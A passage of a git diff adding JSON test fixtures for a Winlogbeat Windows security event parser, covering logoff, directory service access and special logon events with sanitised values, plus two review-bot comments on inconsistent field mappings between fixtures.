Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount 
Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit 
Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", + "event": { + "action": "Logoff", + "code": "4634", + "kind": "event", + "module": "security", + "original": "An account was logged off.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tJ_DOE\n\tLogon ID:\t\t0x5ED35BB6\n\nLogon Type:\t\t\t3\n\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:42:47.895000Z", + "action": { + "id": 4634, + "outcome": "success", + "properties": { + "LogonType": "3", + "TargetDomainName": "J_DOE", + "TargetLogonId": "0x5ed35bb6", + "TargetUserName": "ACCOUNT", + "TargetUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "12345678-abcd-ef90-1234-abcdef123456", + "name": "PC01", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "pc01", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "pc01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "pc01" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "ACCOUNT" + ] + }, + "user": { + "domain": "J_DOE", + "id": "S-1-2-3", + "name": "ACCOUNT", + "target": { + "domain": "J_DOE", + "name": "ACCOUNT" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "PC01.jdoe.com", + "event_id": "4634", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x5ed35bb6", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 704, + "thread": { + "id": 6336 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "15983780774", + "task": "Logoff" + } + } +} \ No newline at end of file 
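Review bot: The expected output for this 4634 logoff fixture carries `event.action: "Logoff"` with no `event.category` or `event.type`, while the 4624 fixture in the same commit expects `event.action: "authentication_network"`, `event.category: ["authentication"]` and `event.type: ["start"]`. If the parser is meant to classify logoffs the same way as logons, the expected block here should include `"category": ["authentication"]` and `"type": ["end"]`, and `event.action` would presumably be normalised as well; if the asymmetry is intentional, a short comment in the parser explaining why 4634 is left unclassified would save the next reader from treating this fixture as a bug. Note that this sample comes from a filebeat 8.14.1 agent with ECS 8.0.0 fields, unlike the 4624 sample from winlogbeat 7.0.0 with ECS 1.0.0, so the difference may stem from which input fields the parser reads rather than from the event id itself.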
diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json new file mode 100644 index 000000000..3d80320f5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4662.json 
@@ -0,0 +1,105 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject 
Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 
Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + }, + "expected": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType 
d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object 
Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": "%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + 
"SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json new file mode 100644 index 000000000..59c3d35b3 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4672.json 
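Review bot: The expected output for security_event_4662.json never surfaces the subject account — `SubjectUserName` `ACCOUNT01$`, `SubjectUserSid` `S-1-2-3` and `SubjectLogonId` stay only under `action.properties`, while the 4672 and 4689 fixtures added in this same commit map the identical `SubjectUser*` fields into `user.domain`/`user.id`/`user.name` and `related.user`. For a Directory Service Access event the subject is the primary pivot (the `ObjectType`/`Properties` GUIDs are only meaningful together with who requested the access), so this fixture is pinning either a parser gap or an undocumented exception. If the asymmetry is intentional, a one-line comment next to the 4662 handling in the parser, e.g. `# 4662: subject fields intentionally left under action.properties`, would stop the next reader from "fixing" it; otherwise the `expected` block here should gain the same `user`/`related.user` entries the 4672 fixture has. The parser itself is outside this hunk, so I cannot tell which case applies.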
@@ -0,0 +1,82 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 